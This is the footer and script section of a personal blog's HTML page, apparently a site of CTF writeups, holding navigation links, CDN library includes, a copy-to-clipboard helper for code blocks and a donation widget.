          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2027
    Panosoiko
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writeups</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="panosoikogr" data-description="Support me on Buy me a coffee!" data-message="Thanks for stopping by! If you’d like to support my work, feel free to treat me to a coffee." data-color="#40DCA5" data-position="Right" data-x_margin="18" data-y_margin="18"></script>

</body>
</html>
